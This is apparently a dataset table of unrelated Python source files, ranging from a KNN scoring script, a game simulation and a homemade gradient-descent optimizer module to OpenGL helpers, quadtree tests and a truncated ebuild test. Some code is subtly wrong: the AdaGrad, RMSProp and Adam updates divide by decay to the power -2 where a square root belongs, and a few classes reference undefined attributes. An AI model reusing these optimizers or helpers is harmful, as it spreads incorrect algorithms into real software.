text stringlengths 38 1.54M |
|---|
import KNN
import gzip
import pickle
import TestBase
def main():
#path = r'C:\Users\mdhal\Desktop\Fall 2018\Machine Learning\Project\Compressed\reviews_Musical_Instruments_5.json.gz'
path = r'C:\Users\mdhal\Desktop\Fall 2018\Machine Learning\Project\Compressed\reviews_Books_5.json.gz'
num_tests = 2000
queries = TestBase.get_query_list(path, num_tests)
num_off = [0] * 5
max_to_grab = TestBase.find_count(queries)
for i in range(5):
for j in range(max_to_grab):
knn_val = KNN.guess_review(queries[i][j])
#print(knn_val)
curr_off = abs(i+1 - knn_val) # actual - estimate
num_off[curr_off] += 1
print("i:{} j:{}".format(i, j))
off = num_off[1] + 2*num_off[2] + 3*num_off[3] + 4*num_off[4]
percent_correct = num_off[0]/len(queries[0])*20
print('NUM CORRECT = ', num_off[0])
print('PERCENT CORRECT = ', percent_correct)
print('AVG OFFSET = ', float(off/len(queries[0])/5))
print('NUM 1 OFF = ', num_off[1])
print('NUM 2 OFF = ', num_off[2])
print('NUM 3 OFF = ', num_off[3])
print('NUM 4 OFF = ', num_off[4])
main()
|
import random
from army_factory import ArmyFactory
from constants import STRATEGIES
class Battlefield:
def __init__(self, num_armies):
self._armies = []
for i in range(num_armies):
self._armies.append(ArmyFactory.create(random.choice(STRATEGIES)))
def start(self):
print("There are {} armies. The strategies are:".format(len(self._armies)))
for i in range(0, len(self._armies)):
print("{} - {}".format(i, self._armies[i].get_strategy()))
for i in range(0, len(self._armies)):
if self._armies[i].is_alive():
target_army = random.choice([x for x in self._armies if x != self._armies[i] and x.is_alive()])
print("\tNEW BATTLE army № {} ATTACKS army № {}. It's strategy is {}".format(i, self._armies.index(target_army), self._armies[i].get_strategy()))
self._armies[i].attack(target_army)
for i in range(0, len(self._armies)):
if self._armies[i].is_alive():
print("ARMY № {} WINS THE WAS. {} IS THE BEST".format(i, self._armies[i].get_strategy()))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
''' Optimizer classes for parameters optimization.
'''
import numpy as np
from simpleflow.base import compute_gradients, DEFAULT_GRAPH
from functools import partial
class Optimizer(object):
"""
优化器
"""
def __init__(self):
self.output_value = None
self.loss = None
self.grad_table = None
def minimize(self, loss):
"""
最小化损失度
:param loss: 损失度
:return:
"""
self.loss = loss
return [self.loss, self]
def compute_output(self):
"""
计算优化器的输出
:return:
"""
self.grad_table = compute_gradients(self.loss)
for var in DEFAULT_GRAPH.trainable_variables:
self.call(var)
return None
def call(self, var):
raise NotImplementedError
class GradientDescentOptimizer(Optimizer):
"""
梯度下降优化器
"""
def __init__(self, learning_rate):
''' Construct a new gradient descent optimizer
:param learning_rate: learning rate of optimizier.
:type learning_rate: float
'''
super(self.__class__, self).__init__()
self.learning_rate = learning_rate
def call(self, var):
''' Compute and return the output value of the operation.
'''
# Get gradient table.
if var in self.grad_table:
# Update its output value.
var.output_value -= self.learning_rate * self.grad_table[var]
del self.grad_table[var]
class StochasticGradientDescentOptimizer(Optimizer):
''' Optimizer that implements the gradient descent algorithm.
'''
def __init__(self, learning_rate):
''' Construct a new gradient descent optimizer
:param learning_rate: learning rate of optimizier.
:type learning_rate: float
'''
super(self.__class__, self).__init__()
self.learning_rate = learning_rate
def call(self, var):
''' Compute and return the output value of the operation.
'''
# 随机梯度下降,TODO
# Get gradient table.
raise NotImplementedError
class MomentumOptimizer(Optimizer):
''' Optimizer that implements the gradient descent algorithm.
'''
def __init__(self, learning_rate, momentum=0., decay=0.):
''' Construct a new gradient descent optimizer
:param learning_rate: learning rate of optimizier.
:type learning_rate: float
'''
super(self.__class__, self).__init__()
self.learning_rate = learning_rate
self.momentum = momentum
self.decay = decay
def call(self, var):
''' Compute and return the output value of the operation.
'''
# 动量梯度下降
# Iterate all trainable variables in graph.
if var in self.grad_table:
# Update its output value.
self.decay = self.momentum * self.decay - self.learning_rate * self.grad_table[var]
var.output_value += self.decay
del self.grad_table[var]
class AdaGradOptimizer(Optimizer):
''' Optimizer that implements the gradient descent algorithm.
'''
def __init__(self, learning_rate, decay=0.):
''' Construct a new gradient descent optimizer
:param learning_rate: learning rate of optimizier.
:type learning_rate: float
'''
super(self.__class__, self).__init__()
self.learning_rate = learning_rate
self.decay = decay
def call(self, var):
''' Compute and return the output value of the operation.
'''
# AdaGrad梯度下降
if var in self.grad_table:
# Update its output value.
self.decay += np.power(self.grad_table[var], 2)
var.output_value -= self.learning_rate * self.grad_table[var] / (np.power(self.decay, -2) + 1e-8)
del self.grad_table[var]
class RMSPropOptimizer(Optimizer):
''' Optimizer that implements the gradient descent algorithm.
'''
def __init__(self, learning_rate, beta=0.999, decay=0.):
''' Construct a new gradient descent optimizer
:param learning_rate: learning rate of optimizier.
:type learning_rate: float
'''
super(self.__class__, self).__init__()
self.learning_rate = learning_rate
self.decay = decay
self.beta = beta
def call(self, var):
''' Compute and return the output value of the operation.
'''
# RMSProp梯度下降
if var in self.grad_table:
# Update its output value.
self.decay = self.beta * self.decay + (1 - self.beta) * np.power(self.grad_table[var], 2)
var.output_value -= self.learning_rate * self.grad_table[var] / (np.power(self.decay, -2) + 1e-8)
del self.grad_table[var]
class AdamOptimizer(Optimizer):
''' Optimizer that implements the gradient descent algorithm.
'''
def __init__(self, learning_rate, beta1=0.9, beta2=0.999, momentum=0., decay=0.):
''' Construct a new gradient descent optimizer
:param learning_rate: learning rate of optimizier.
:type learning_rate: float
'''
super(self.__class__, self).__init__()
self.learning_rate = learning_rate
self.decay = decay
self.momentum = momentum
self.beta1 = beta1
self.beta2 = beta2
def call(self, var):
''' Compute and return the output value of the operation.
'''
# Adam梯度下降
if var in self.grad_table:
# Update its output value.
self.momentum = self.beta1 * self.momentum + (1 - self.beta1) * self.grad_table[var]
self.decay = self.beta2 * self.decay + (1 - self.beta2) * np.power(self.grad_table[var], 2)
var.output_value -= self.learning_rate * self.momentum / (np.power(self.decay, -2) + 1e-8)
del self.grad_table[var]
|
fname = input('Enter the file name: ')
try:
fhand = open(fname)
except:
print('File can not be opened:',fname)
quit()
count = 0
for line in fhand:
if line.startswith('s'):
count = count + 1
print('There were ',count, 'lines starts with s in',fname)
|
from __future__ import division
#/usr/bin/env python
# -*- coding: utf-8 -*-
#
# exclude duplicates in same line and sort to ensure one word is always before other
#
# look: https://stackoverflow.com/questions/21297740/how-to-find-set-of-most-frequently-occurring-word-pairs-in-a-file-using-python
#
# Copyright 2018 Vasiliki Kordopati <vasiliki.kordopati@Vasilikis-MacBook-Pro.local>
#
# example of input:
# DOID_4236 DOID_4236 DOID_4195 DOID_4195 DOID_4195 DOID_4195 DOID_4236 CHEBI_16199
# DOID_0060260 DOID_0060145 UBERON_0001711 GO_0008152 UBERON_0000955
# DOID_4071 DOID_4029 DOID_4071 DOID_4029 DOID_1724 DOID_4071 DOID_4029 DOID_4029 DOID_4071 DOID_4029 UBERON_0001165 UBERON_0001166
# DOID_11755 UBERON_0002394 UBERON_0001174 ENVO_01000472 UBERON_0004529 UBERON_0002114 UBERON_0007651
# DOID_9408 CHEBI_23888
#
# example of output:
# ['CHEBI_16199', 'DOID_4195', 'DOID_4236']
# ['DOID_0060145', 'DOID_0060260', 'GO_0008152', 'UBERON_0000955', 'UBERON_0001711']
# ['DOID_1724', 'DOID_4029', 'DOID_4071', 'UBERON_0001165', 'UBERON_0001166']
# ['DOID_11755', 'ENVO_01000472', 'UBERON_0001174', 'UBERON_0002114', 'UBERON_0002394', 'UBERON_0004529', 'UBERON_0007651']
# ['CHEBI_23888', 'DOID_9408']
#
#import file input
import re
import sys
import os
import os, os.path
import math
import subprocess
import multiprocessing
from math import log
from itertools import combinations
from collections import Counter
corpus =[]
#load the corpus
with open(sys.argv[1],'r') as infile2:
corpus_lines = [lin2.rstrip('\n') for lin2 in infile2]
for line in corpus_lines:
wordList = re.sub("[^\w]", " ", line).split()
corpus.append(wordList)
#print lines2
infile2.close()
print 'i finished: load the corpus'
#print corpus
for line in corpus:
unique_tokens = sorted(set(line)) # exclude duplicates in same line and sort to ensure one word is always before other
print unique_tokens
with open(sys.argv[2], 'a') as f1:
f1.write(str(unique_tokens)+'\n')
f1.close()
|
import csv
import matplotlib.pyplot as plt
import numpy as np
import time
import os
import sqlite3
import requests
class alvian:
#Buat Manggil semua aja .
def MataBatin(self):
self.nomor()
self.nama()
self.uang()
self.Matplotlib()
self.cobaWhile()
self.CobaTabel()
self.InputData()
self.ViewData()
self.requestaja()
self.requestaja2()
#method if, if else, if elif else :
def nomor(self):
with open('kelas_2c/alvian.csv') as file:
datanya = csv.reader(file, delimiter=',')
for r in datanya:
if int(r[0]) < 30000:
print ("Bayar",(r[1]))
def nama(self):
with open('kelas_2c/alvian.csv') as file:
datanya = csv.reader(file, delimiter=',')
for r in datanya:
if int(r[0]) == 20000:
print ((r[1]),"nama paling keren")
else:
print ((r[1]),"bukan alvian Oy")
def uang(self):
with open('kelas_2c/alvian.csv') as file:
datanya = csv.reader(file, delimiter=',')
for r in datanya:
if int(r[0]) == 20000:
print ("punya uang Rp.",(r[0]),"aku lumayan kaya loh","atas nama",(r[1]))
elif int(r[0]) == 30000:
print ("punya uang Rp.",(r[0]),"Disini Kaya boy","atas nama",(r[1]))
elif int(r[0]) == 21000:
print ("punya uang Rp.",(r[0]),"masih miskin loh :)","atas nama",(r[1]))
else:
print ("punya uang Rp.",(r[0]),"kurang kaya aku","atas nama",(r[1]))
#Penggunaan Matplotlib
def Matplotlib(self):
x = np.arange(0, 3 * np.pi, 0.1)
y_sin = np.sin(x)
y_cos = np.cos(x)
plt.subplot(2, 1, 1)
# buat awal plot
plt.plot(x, y_sin)
plt.title('Sine')
plt.subplot(2, 1, 2)
plt.plot(x, y_cos)
plt.title('Cosine')
plt.savefig("kelas_2c/vian_Matplotlib.png")
# nampilin Gambar Matplotib
plt.show()
# Penggunaan While Aja Dulu
def cobaWhile(self):
list1 = open('kelas_2c/alvian.txt','r')
list2 = list1
list1 = iter(list1)
print ("The contents of list are : ")
start_next = time.time()
while (1) :
val = next(list1,'end')
if val == 'end':
break
else :
print (val)
print ("Time taken for next() is : " + str(time.time() - start_next))
start_for = time.time()
for i in list2 :
print (i)
print ("Time taken for loop is : " + str(time.time() - start_for))
#Database Proses Create, Input, View
def CobaTabel(self):
try:
self.connection = sqlite3.connect('./kelas_2c/alvianpunya.db')
self.cursor = self.connection.cursor()
self.cursor.execute('CREATE TABLE vian (id INTEGER PRIMARY KEY, nama VARCHAR(50), rupiah VARCHAR(50))')
except:
print("Failed Tabel Again Coyy!")
def InputData(self):
try:
self.cursor.execute('INSERT INTO vian VALUES(?, ?, ?)', (1, "alvian", "Dua Puluh Ribu"))
self.cursor.execute('INSERT INTO vian VALUES(?, ?, ?)', (2, "sinaga", "Tiga Puluh Ribu"))
self.cursor.execute('INSERT INTO vian VALUES(?, ?, ?)', (3, "daniel", "Tiga Puluh lima Ribu"))
self.connection.commit()
except:
print("Failed Table Again Coyy!")
def ViewData(self):
self.cursor.execute('SELECT * FROM vian')
row = self.cursor.fetchone()
nama = row[1]
rupiah = row[2]
print("nama : " + str(nama))
print("rupiah : " + str(rupiah))
self.connection.commit()
#Request File and Linkweb
def requestaja(self):
i = requests.get('https://www.youtube.com/watch?v=rJHCtij6vaA&list=RDrJHCtij6vaA&start_radio=1')
print(i.text)
def requestaja2(self):
i = requests.get('https://github.com/cemewew asd123 3213')
print(i.status_code)
if i:
print('Belajar Yang pinter aja dulu')
else:
print('banyak banyak Doa :)') |
from django.apps import AppConfig
class InformationSourcesConfig(AppConfig):
name = 'information_sources'
|
import gtk
from gobject import timeout_add, source_remove
class EscapeObject(object): pass
class FeedbackPopup(object):
def __init__(self):
self.window = gtk.Window(gtk.WINDOW_TOPLEVEL)
self.window.set_property('allow-shrink', True)
self.window.props.skip_pager_hint = True
self.window.props.skip_taskbar_hint = True
self.window.props.accept_focus = False
self.window.set_decorated(False)
self.bar = gtk.EventBox()
self.bar.set_border_width(5)
box = gtk.EventBox()
self.label = gtk.Label()
self.label.set_alignment(0, 0)
self.label.set_padding(10, 0)
box.add(self.label)
self.bar.add(box)
self.bar.show_all()
self.window.add(self.bar)
self.window.realize()
self.window.window.set_override_redirect(True)
self.timeout_id = None
self.escape = None
self.handlers_connected = False
def focus_out_event(self, wnd, event):
self.window.hide()
def focus_in_event(self, wnd, event):
if self.timeout_id:
self.window.show()
def remove_timeout(self):
if self.timeout_id:
source_remove(self.timeout_id)
self.timeout_id = None
def show(self, editor, text, timeout=1500, markup=False):
if not self.handlers_connected:
self.handlers_connected = True
toplevel = editor.window
toplevel.connect('focus-out-event', self.focus_out_event)
toplevel.connect('focus-in-event', self.focus_in_event)
self.remove_timeout()
if self.escape:
self.hide()
if markup:
self.label.set_markup(text)
else:
self.label.set_text(text)
self.window.resize(*self.window.size_request())
win = editor.view.get_window(gtk.TEXT_WINDOW_TEXT)
x, y, w, h, _ = win.get_geometry()
x, y = win.get_origin()
mw, mh = self.window.get_size()
self.window.set_transient_for(editor.window)
self.window.move(x + w - mw, y + h - mh)
self.window.show()
if not self.escape:
self.escape = EscapeObject()
self.timeout_id = timeout_add(timeout, self.hide)
def hide(self, *args):
self.remove_timeout()
self.window.hide()
self.escape = None
return False
|
class ProcessControlBlock:
def __init__(self, pid, resources, status, ready_list, pcb_parent, priority):
self.pid = pid
self.resources = resources,
self.status = status
self.ready_list = ready_list
self.pcb_parent = pcb_parent
self.pcb_children = []
self.priority = priority
|
# -*- coding: utf-8 -*-
"""
This module provides the miscellaneous utility functions required by kousen.gl.
"""
from OpenGL import GL
from OpenGL import GLU
from PySide import QtCore
from PySide import QtGui
class Scope(object):
"""
Scope provides a context manager base interface for various OpenGL operations.
"""
def __init__(self):
super(Scope, self).__init__()
def __enter__(self):
pass
def __exit__(self, type, value, traceback):
return type
def push(self):
self.__enter__()
def pop(self):
self.__exit__(None, None, None)
class CompoundScope(Scope):
"""
CompoundScope provides a context manager for a sequence of Scope objects.
"""
def __init__(self, *args):
super(Scope, self).__init__()
self.__args = args
def __enter__(self):
for item in self.__args:
item.__enter__()
def __exit__(self, type, value, traceback):
for item in reversed(self.args):
item.__exit__(type, value, traceback)
return type
class GLUQuadricScope(Scope):
"""
GLUQuadricScope provides a context manager for a GLU.Quadric operations
"""
def __init__(self):
super(GLUQuadricScope, self).__init__()
self._quadric = None
def __enter__(self):
if not self._quadric:
self._quadric = GLU.gluNewQuadric()
def __exit__(self ,type, value, traceback):
if self._quadric:
GLU.gluDeleteQuadric(_quadric);
self._quadric = None
return not type
class GLAttribScope(Scope):
"""
GLAttribScope provides a context manager for an OpenGL Attribute operations (i.e. GL.glPushAttrib / GL.glPopAttrib)
"""
def __init__(self, mask):
super(GLAttribScope, self).__init__()
self._mask = mask
def __enter__(self):
GL.glPushAttrib(self._mask)
def __exit__(self ,type, value, traceback):
GL.glPopAttrib()
return not type
class GLClientAttribScope(Scope):
"""
GLClientAttribScope provides a context manager for an OpenGL Client Attribute operations (i.e. GL.glPushClientAttrib / GL.glPushClientAttrib)
"""
def __init__(self, mask):
super(GLClientAttribScope, self).__init__()
self._mask = mask
def __enter__(self):
GL.glPushClientAttrib(self._mask)
def __exit__(self, type, value, traceback):
GL.glPopClientAttrib()
return not type
class GLMatrixScope(Scope):
"""
GLClientAttribScope provides a context manager for an OpenGL Matrix Stack operations (i.e. GL.glPushMatrix / GL.glPopMatrix)
"""
def __init__(self, matrixmode=None, identity=False):
super(GLMatrixScope, self).__init__()
self._nextmode = matrixmode
self._identity = identity
def __enter__(self):
if self._nextmode:
self._prevmode = GL.glGetIntegerv(GL.GL_MATRIX_MODE)
GL.glMatrixMode(self._nextmode)
GL.glPushMatrix();
if self._identity:
GL.glLoadIdentity()
def __exit__(self ,type, value, traceback):
GL.glPopMatrix()
if self._nextmode:
GL.glMatrixMode(self._prevmode)
return not type
class GLVariableScope(Scope):
"""
GLVariableScope provides a context manager for an OpenGL variable operations
with GLVariableScope(GL.glLineWidth, GL.GL_LINE_WIDTH, 3.0):
...
"""
def __init__(self, glmethod, glid, value):
super(GLVariableScope, self).__init__()
self._prevvalue = None
self._nextvalue = value
self._set = glmethod
self._id = glid
def __enter__(self):
self._prevvalue = GL.glGetInteger(self._id)
self._set(self._nextvalue)
def __exit__(self ,type, value, traceback):
self._set(self._prevvalue)
return not type
class GLColorScope(Scope):
"""
GLColorScope provides a context manager for an OpenGL glColor operations independent of the GL.GL_CURRENT_COLOR attribute.
with GLColorScope(color):
...
"""
def __init__(self, qcolor):
super(GLColorScope, self).__init__()
self._glcolor = None
self._qcolor = None
if isinstance(qcolor, QtGui.QColor):
self._qcolor = qcolor
elif isinstance(qcolor, QtCore.Qt.GlobalColor):
self._qcolor = QtGui.QColor(qcolor)
def __enter__(self):
if not self._glcolor and self._qcolor:
self._glcolor = GL.glGetFloatv(GL.GL_CURRENT_COLOR)
GL.glColor(self._qcolor.getRgbF())
def __exit__(self ,type, value, traceback):
if self._glcolor:
GL.glColor(self._glcolor)
self._glcolor = None
return not type
class GLScope(Scope):
"""
GLScope provides a context manager for an OpenGL operations (GL.glBegin / GL.glEnd)
with GLVariableScope(GL.glLineWidth, GL.GL_LINE_WIDTH, 3.0):
...
"""
def __init__(self, mode):
super(GLScope, self).__init__()
self._mode = mode
def __enter__(self):
GL.glBegin(self._mode)
def __exit__(self ,type, value, traceback):
GL.glEnd()
return not type
|
import unittest, SpatialBasedQuadTree
from SpatialBasedQuadTree import SpatialQuadTree2D
from QuadTestItem import TestItem
from random import randint
runPerformanceTests = False
class Tester(unittest.TestCase):
def test_GetItemXY(self):
q = getBaseSpatialTree()
intendedX = 10
intendedY = 10
t = TestItem(intendedX, intendedY)
actualX, actualY = q.getItemXY(t)
self.assertTrue(intendedX == actualX and intendedY == actualY)
def test_HasNone(self):
q = getBaseSpatialTree()
self.assertTrue(q.hasNone(14, 'ee', getBaseSpatialTree(), None))
def test_XYToItemWhenNone(self):
q = getBaseSpatialTree()
t = TestItem(10,10)
x,y = q.xyToItemWhenNone(t, 10, None)
self.assertTrue(x == 10 and y == 10)
def testAdd(self, amountToAdd=None):
if amountToAdd is None:
amountToAdd = 1000
q = getQuadTreeWithItems()
itemsAdded = []
for i in range(amountToAdd):
t = TestItem(randint(0,q.width), randint(0,q.length))
itemsAdded.append(t)
self.assertTrue(q.add(t))
self.assertFalse(q.add(TestItem(10000,10000)))
return q, itemsAdded
def testBigAdd(self):
global runPerformanceTests
if not runPerformanceTests:
return
n = 1000 * 100
x,y = 0,0
len,width = n,n
capacity = 30
s = {}
q = getBaseSpatialTree(x=x, y=y, l=len, w=width, c=capacity, s=s)
for i in range(n):
print("Now doing " + str(i))
self.assertTrue(q.add(TestItem(randint(0, n), randint(0, n))))
self.assertFalse(q.add(TestItem(n * 2, n * 2)))
def testIsWithinQuadRange(self):
q = getBaseSpatialTree()
# 500,500, q.originX, q.originY, q.width, q.length
self.assertTrue(q.isWithinQuadRange(500,500, q.originX, q.originY, q.width, q.length))
self.assertTrue(q.isWithinQuadRange(0, 0, q.originX, q.originY, q.width, q.length))
self.assertTrue(q.isWithinQuadRange(1000, 1000, q.originX, q.originY, q.width, q.length))
self.assertTrue(q.isWithinQuadRange(500, 500))
self.assertTrue(q.isWithinQuadRange(0, 0))
self.assertTrue(q.isWithinQuadRange(1000, 1000))
def testFindItemsThatBelongInQuad(self):
q,itemsAdded = self.testAdd(1000)
itemsBelongingInQuad = []
itemsNotBelongingInQuad = []
itemsToBeChecked = {}
for i in itemsAdded:
if randint(0,1) is 1:
itemsBelongingInQuad.append(i)
else:
itemsNotBelongingInQuad.append(TestItem(10000,randint(10000,100000)))
for i in itemsBelongingInQuad + itemsNotBelongingInQuad:
itemsToBeChecked[i] = q
itemsToBelongInQuad = q.findItemsThatBelongInQuad(itemsToBeChecked, q.originX, q.originY, q.width, q.length)
for i in itemsBelongingInQuad:
self.assertTrue(i in itemsToBelongInQuad)
for i in itemsNotBelongingInQuad:
self.assertTrue(i not in itemsToBelongInQuad)
def testChooseQuadByXY(self):
q0,q1,q2,q3 = getChildrenOfBaseSpatialTree()
q = getBaseSpatialTree()
q.quadrant0 = q0
q.quadrant1 = q1
q.quadrant2 = q2
q.quadrant3 = q3
x = 150
y = 150
self.assertTrue(q.chooseQuadByXY(x,y) is q0)
x = 0
y = 0
self.assertTrue(q.chooseQuadByXY(x,y) is q0)
x = 250
y=250
self.assertTrue(q.chooseQuadByXY(x,y) is q0)
x = 600
y=400
self.assertTrue(q.chooseQuadByXY(x,y) is q1)
x = 1000
self.assertTrue(q.chooseQuadByXY(x,y) is q1)
x = 750
y = 799
self.assertTrue(q.chooseQuadByXY(x,y) is q2)
x = 1000
y = 1000
self.assertTrue(q.chooseQuadByXY(x,y) is q2)
x=450
y=600
self.assertTrue(q.chooseQuadByXY(x,y) is q3)
x=400
self.assertTrue(q.chooseQuadByXY(x, y) is q3)
def testIsWithinCapacity(self):
q = getQuadTreeWithItems()
self.assertTrue(q.isWithinCapacity([TestItem(10,10)], q.quadrantCapacity))
def testExpandCapacity(self):
q = getBaseSpatialTree()
q.expandCapacity()
self.assertTrue(q.quadrant0 is not None)
self.assertTrue(q.quadrant1 is not None)
self.assertTrue(q.quadrant2 is not None)
self.assertTrue(q.quadrant3 is not None)
def testRemoveItem(self, amountToRemove=None):
if amountToRemove is None:
amountToRemove = 100
q, itemsAdded = self.testAdd(amountToRemove * 10)
itemsRemoved = []
for i in itemsAdded:
if randint(0,1):
itemsRemoved.append(i)
didRemove, itemRemoved = q.removeItem(i, i.x, i.y)
self.assertTrue(didRemove)
self.assertTrue(itemRemoved is i)
for i in itemsRemoved:
self.assertFalse(q.containsItem(i, i.x, i.y))
self.assertFalse(q.containsItem(i))
didRemove, itemRemoved = q.removeItem(i, i.x, i.y)
self.assertFalse(didRemove)
self.assertTrue(itemRemoved is None)
self.assertFalse(self.quadContainsItem(q, i))
'''
Forcibly looks at the quad and all its children quads to see if
item is in it
'''
def quadContainsItem(self, q, item):
return self.getQuadContainingItem(q, item) is not None
def getQuadContainingItem(self,q, item):
if q.quadrant0 is not None:
if self.quadContainsItem(q.quadrant0, item):
return q.quadrant0
if q.quadrant1 is not None:
if self.quadContainsItem(q.quadrant1, item):
return q.quadrant1
if q.quadrant2 is not None:
if self.quadContainsItem(q.quadrant2, item):
return q.quadrant2
if q.quadrant3 is not None:
if self.quadContainsItem(q.quadrant3, item):
return q.quadrant3
if q.itemsAndAssociatedQuads is None:
return None
if item in q.itemsAndAssociatedQuads:
return q
return None
def testGetAllItemsWithinWidthLength(self):
q = getBaseSpatialTree()
areaX = 450
areaY = 600
areaWidth = 100
areaLength = 100
itemsNotToBeIncluded = []
itemsToBeIncluded = []
def getNonAreaX():
if randint(0, 1):
return randint(0, 449)# X before area to look at
return randint(551, q.width)
def getNonAreaY():
if randint(0, 1):
return randint(0, 599)# Y before area Y
return randint(700, q.length)
def getAreaX():
return randint(areaX, areaX + areaWidth)
def getAreaY():
return randint(areaY, areaY + areaLength)
for i in range(100):
itemsNotToBeIncluded.append(TestItem(getNonAreaX(), getNonAreaY()))
for i in range(100):
itemsToBeIncluded.append(TestItem(getAreaX(), getAreaY()))
for i in itemsToBeIncluded:
q.add(i)
for i in itemsNotToBeIncluded:
q.add(i)
itemsWithinWidthLength = q.getAllItemsWithinWidthLength(areaX, areaY, areaWidth, areaLength)
for i in itemsToBeIncluded:
if i not in itemsWithinWidthLength:
print("Should: "+"x: " + str(i.x) + " y: " + str(i.y))
self.assertTrue(self.quadContainsItem(q,i))
self.assertTrue(i in itemsWithinWidthLength)
for i in itemsNotToBeIncluded:
self.assertTrue(self.quadContainsItem(q, i))
self.assertFalse(i in itemsWithinWidthLength)
def testContainsItem(self):
q, itemsAdded = self.testAdd()
itemsNotAdded = [TestItem(randint(0, q.width), randint(0,q.length)) for i in range(100)]
for i in itemsAdded:
self.assertTrue(q.containsItem(i))
for i in itemsNotAdded:
self.assertFalse(q.containsItem(i))
def testInitChildQuads(self):
q = getBaseSpatialTree()
q.itemsAndAssociatedQuads = {TestItem(10,10) : q,
TestItem(100,100) : q}
q.initChildQuads(clearParentItemsWhenDone=True)
self.assertTrue(len(q.itemsAndAssociatedQuads) == 0)
#TEST q0
q0 = q.quadrant0
self.assertTrue(q0 is not None)
self.assertTrue(q0.originX == q.originX)
self.assertTrue(q0.originY == q.originY)
self.assertTrue(q0.width == q.width / 2)
self.assertTrue(q0.length == q.length / 2)
#
q1 = q.quadrant1
self.assertTrue(q1 is not None)
self.assertTrue(q1.originX == q.originX + q.width / 2)
self.assertTrue(q1.originY == q.originY)
self.assertTrue(q1.width == q.width / 2)
self.assertTrue(q1.length == q.length / 2)
#
q2 = q.quadrant2
self.assertTrue(q2 is not None)
self.assertTrue(q2.originX == q.originX + q.width / 2)
self.assertTrue(q2.originY == q.originY + q.length / 2)
self.assertTrue(q2.width == q.width / 2)
self.assertTrue(q2.length == q.length / 2)
#
q3 = q.quadrant3
self.assertTrue(q3 is not None)
self.assertTrue(q3.originX == q.originX)
self.assertTrue(q3.originY == q.originY + q.length / 2)
self.assertTrue(q3.width == q.width / 2)
self.assertTrue(q3.length == q.length / 2)
def testUpdateQuadToUpdatedItem(self):
q, itemsAdded = self.testAdd(100)
for i in range(5000):
t = itemsAdded[randint(0, len(itemsAdded) - 1)]
oldX, oldY = t.x, t.y
t.x = randint(0, q.width)
t.y = randint(0, q.length)
q.updateQuadToUpdatedItem(t, t.x, t.y, oldX, oldY)
self.assertTrue(q.containsItem(t))
qTemp = self.getQuadContainingItem(q, t)
self.assertTrue(qTemp.isWithinQuadRange(t.x, t.y))
def testAreChildrenBorn(self):
q = getBaseSpatialTree()
q.quadrant0 = getBaseSpatialTree()
self.assertTrue(q.areChildrenBorn())
q.quadrant0 = q.quadrant1 = q.quadrant2 = q.quadrant3 = getBaseSpatialTree()
self.assertTrue(q.areChildrenBorn())
def testGetChildrenQuadAsList(self):
q = getQuadTreeWithItems()
for i in range(1000):
q.add(TestItem(randint(0, i), randint(0, i)))
q0,q1,q2,q3 = q.getChildrenQuadAsTuple()
self.assertTrue(q0 is not None)
self.assertTrue(q1 is not None)
self.assertTrue(q2 is not None)
self.assertTrue(q3 is not None)
self.assertTrue(type(q0) is SpatialQuadTree2D)
self.assertTrue(type(q1) is SpatialQuadTree2D)
self.assertTrue(type(q2) is SpatialQuadTree2D)
self.assertTrue(type(q3) is SpatialQuadTree2D)
print("Starting tests")
def getBaseSpatialTree(x=None,y=None,w=None,l=None,s=None,c=None):
if y is None:
y = 0
if x is None:
x=0
if l is None:
l = 1000
if w is None:
w = 1000
if s is None:
s = {}
if c is None:
c = 25
quad = SpatialBasedQuadTree.SpatialQuadTree2D(originX=x, originY=y, length=l, width=w, storedItems=s,
quadrantCapacity=c)
return quad
def getChildrenOfBaseSpatialTree():
baseTree = getBaseSpatialTree()
x = baseTree.originX
y = baseTree.originY
l = baseTree.length / 2
w = baseTree.width / 2
s = {}
c = baseTree.quadrantCapacity
q0 = SpatialBasedQuadTree.SpatialQuadTree2D(originX=x, originY=y, length=l, width=w, storedItems=s,
quadrantCapacity=c)
l = baseTree.length / 2
w = baseTree.width / 2
x = baseTree.originX + w
y = baseTree.originY
s = {}
c = baseTree.quadrantCapacity
q1 = SpatialBasedQuadTree.SpatialQuadTree2D(originX=x, originY=y, length=l, width=w, storedItems=s,
quadrantCapacity=c)
l = baseTree.length / 2
w = baseTree.width / 2
x = baseTree.originX + w
y = baseTree.originY + l
s = {}
c = baseTree.quadrantCapacity
q2 = SpatialBasedQuadTree.SpatialQuadTree2D(originX=x, originY=y, length=l, width=w, storedItems=s,
quadrantCapacity=c)
l = baseTree.length / 2
w = baseTree.width / 2
x = baseTree.originX
y = baseTree.originY + l
s = {}
c = baseTree.quadrantCapacity
q3 = SpatialBasedQuadTree.SpatialQuadTree2D(originX=x, originY=y, length=l, width=w, storedItems=s,
quadrantCapacity=c)
return q0,q1,q2,q3
def getQuadTreeWithItems():
x=0
y = 0
l = 1000
w = 1000
s = [TestItem(10,10)]
c = 25
quad = SpatialBasedQuadTree.SpatialQuadTree2D(originX=x, originY=y, length=l, width=w, storedItems=s,
quadrantCapacity=c)
return quad
if __name__ == "__main__":
unittest.main() |
"""Ebuild Tests."""
import copy
import logging
import os
import unittest
import unittest.mock
from typing import Any, Callable, Dict, Tuple
from etest.ebuild import Ebuild
from etest_test.fixtures_test import FIXTURES_DIRECTORY
from etest_test.fixtures_test.ebuilds_test import EBUILDS
logger = logging.getLogger(__name__)
class BaseEbuildMetaTest(type):
"""Base Ebuild Metatest."""
def __init__(cls, name: str, bases: Tuple[type, ...], dct: Dict[str, Any]) -> None:
"""Construct a base Ebuild meta test."""
super(BaseEbuildMetaTest, cls).__init__(name, bases, dct)
def gen_constructor_case(
ebuild: Dict[str, Any]
) -> Callable[["EbuildUnitTest"], None]:
def case(self: "EbuildUnitTest") -> None:
result = Ebuild(
path=ebuild["path"],
overlay=self.mocked_overlay,
)
self.assertEqual(result.path, ebuild["path"])
self.assertEqual(result.overlay, self.mocked_overlay)
case.__name__ = "test_constructor_" + str(ebuild["uuid"])
case.__doc__ = (
f"ebuild.Ebuild(path = '{ebuild['path']}', overlay = mocked_overlay)"
)
return case
def gen_property_case(
ebuild: Dict[str, Any], prop: str
) -> Callable[["EbuildUnitTest"], None]:
def case(self: "EbuildUnitTest") -> None:
result = Ebuild(
path=ebuild["path"],
overlay=self.mocked_overlay,
)
result.parse = unittest.mock.MagicMock(return_value=ebuild["symbols"])
self.assertEqual(getattr(result, prop), ebuild[prop])
case.__name__ = "test_property_" + prop + "_" + str(ebuild["uuid"])
